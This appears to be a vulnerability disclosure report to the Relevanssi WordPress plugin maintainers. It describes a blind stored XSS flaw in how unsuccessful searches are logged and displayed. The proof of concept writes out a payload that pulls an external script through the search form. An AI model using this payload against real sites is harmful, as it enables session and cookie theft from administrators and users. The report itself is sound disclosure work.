Description

Good afternoon. Beginning on 12 October 2021, our XSS catcher started receiving callbacks from a group of sites that are using the Relevanssi plugin for Wordpress. It appears to us that the software is not properly filtering Unsuccessful searches before displaying the information to the user. One of the sites that we received a blind stored XSS callback from is an offshore private bank. 👀

Proof of Concept

Our payload was sent via the website’s search form and was formatted like so: foo"><script src=//xss></script><x=", which was displayed to the user’s of your plug-in like so:

&lt;td&gt;foo"&gt;&lt;script src="//xss"&gt;&lt;/script&gt;&lt;x=" &lt;a="" href="https://website/?s=foo%22%3E%3Cscript%20src%3D%2F%2Fxss%3E%3C%2Fscript%3E%3Cx%3D%22"&gt;<span></span>&lt;/x="&gt;&lt;/td&gt;
						&lt;td style="padding: 3px 5px; text-align: center"&gt;2</td>

Impact

This flaw allows attackers to pass rogue JavaScript to unsuspecting users. Since the user’s browser has no way to know the script should not be trusted, it will execute the script, which can then access any cookies, session tokens, or other sensitive information retained by the browser and used with your website. In fact, here is a list of 21 other things that hackers can do with an XSS flaw: https://s0md3v.github.io/21-things-xss/